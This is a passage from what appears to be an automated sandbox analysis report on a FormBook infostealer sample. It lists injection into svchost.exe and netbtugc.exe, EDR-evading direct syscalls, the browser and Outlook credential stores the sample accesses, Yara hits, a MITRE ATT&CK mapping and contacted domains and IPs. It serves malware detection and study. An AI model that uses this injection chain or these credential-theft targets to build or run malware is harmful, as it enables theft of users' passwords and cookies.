            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]2_2_03BB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h]2_2_03C008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]2_2_03BBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]2_2_03B30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03BFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03B5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov ecx, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A830 mov eax, dword ptr fs:[00000030h]2_2_03B6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h]2_2_03BD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h]2_2_03BD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC810 mov eax, dword ptr fs:[00000030h]2_2_03BBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE872 mov eax, dword ptr fs:[00000030h]2_2_03BBE872
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C8A937 GetProcessHeap,0_2_00C8A937
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C88E19 SetUnhandledExceptionFilter,0_2_00C88E19
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C88E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C88E3C

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtQueryVolumeInformationFile: Direct from: 0x76F12F2CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtQuerySystemInformation: Direct from: 0x76F148CCJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtAllocateVirtualMemory: Direct from: 0x76F148ECJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtQueryAttributesFile: Direct from: 0x76F12E6CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtReadVirtualMemory: Direct from: 0x76F12E8CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtCreateKey: Direct from: 0x76F12C6CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtSetInformationThread: Direct from: 0x76F12B4CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtClose: Direct from: 0x76F12B6C
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtOpenKeyEx: Direct from: 0x76F13C9CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtWriteVirtualMemory: Direct from: 0x76F1490CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtCreateUserProcess: Direct from: 0x76F1371CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtTerminateThread: Direct from: 0x76F12FCCJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtCreateFile: Direct from: 0x76F12FECJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtOpenFile: Direct from: 0x76F12DCCJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtQueryInformationToken: Direct from: 0x76F12CACJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtAllocateVirtualMemory: Direct from: 0x76F12BECJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtDeviceIoControlFile: Direct from: 0x76F12AECJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtSetInformationThread: Direct from: 0x76F063F9Jump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtOpenSection: Direct from: 0x76F12E0CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtMapViewOfSection: Direct from: 0x76F12D1CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtResumeThread: Direct from: 0x76F136ACJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtCreateMutant: Direct from: 0x76F135CCJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtWriteVirtualMemory: Direct from: 0x76F12E3CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtNotifyChangeKey: Direct from: 0x76F13C2CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtProtectVirtualMemory: Direct from: 0x76F07B2EJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtProtectVirtualMemory: Direct from: 0x76F12F9CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtSetInformationProcess: Direct from: 0x76F12C5CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtOpenKeyEx: Direct from: 0x76F12B9CJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtQueryInformationProcess: Direct from: 0x76F12C26Jump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtResumeThread: Direct from: 0x76F12FBCJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtDelayExecution: Direct from: 0x76F12DDCJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtReadFile: Direct from: 0x76F12ADCJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtQuerySystemInformation: Direct from: 0x76F12DFCJump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 7868Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30A7008Jump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C9BE95 LogonUserW,0_2_00C9BE95
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C6374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_00C6374E
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CA4B52 SendInput,keybd_event,0_2_00CA4B52
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CA7DD5 mouse_event,0_2_00CA7DD5
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe"Jump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C9B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00C9B398
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C9BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C9BE31
            Source: 3T-ENQ-O-2024-10856.exe, CgEnKbPFVbMNeA.exe, 00000004.00000000.1735115835.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000002.2599001992.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000000.1880241161.00000000016D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CgEnKbPFVbMNeA.exe, 00000004.00000000.1735115835.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000002.2599001992.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000000.1880241161.00000000016D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: 3T-ENQ-O-2024-10856.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: CgEnKbPFVbMNeA.exe, 00000004.00000000.1735115835.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000002.2599001992.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000000.1880241161.00000000016D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: CgEnKbPFVbMNeA.exe, 00000004.00000000.1735115835.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000002.2599001992.0000000001061000.00000002.00000001.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000000.1880241161.00000000016D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C87254 cpuid 0_2_00C87254
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C840DA GetSystemTimeAsFileTime,__aulldiv,0_2_00C840DA
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CDC146 GetUserNameW,0_2_00CDC146
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C92C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00C92C3C
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C7E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C7E47B

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: 3T-ENQ-O-2024-10856.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
            Source: 3T-ENQ-O-2024-10856.exeBinary or memory string: WIN_81
            Source: 3T-ENQ-O-2024-10856.exeBinary or memory string: WIN_XP
            Source: 3T-ENQ-O-2024-10856.exeBinary or memory string: WIN_XPe
            Source: 3T-ENQ-O-2024-10856.exeBinary or memory string: WIN_VISTA
            Source: 3T-ENQ-O-2024-10856.exeBinary or memory string: WIN_7
            Source: 3T-ENQ-O-2024-10856.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00CB91DC
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00CB96E2

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		3
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1509340 Sample: 3T-ENQ-O-2024-10856.exe Startdate: 11/09/2024 Architecture: WINDOWS Score: 100 28 www.tigre777gg.online 2->28 30 www.mediaplug.biz 2->30 32 7 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 3 other signatures 2->48 10 3T-ENQ-O-2024-10856.exe 3 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 64 Switches to a custom stack to bypass stack traces 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 CgEnKbPFVbMNeA.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 CgEnKbPFVbMNeA.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.independent200.org 103.42.108.46, 49719, 49720, 49721 SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU Australia 22->34 36 www.mediaplug.biz 66.81.203.10, 49715, 49716, 49717 CONFLUENCE-NETWORK-INCVG Virgin Islands 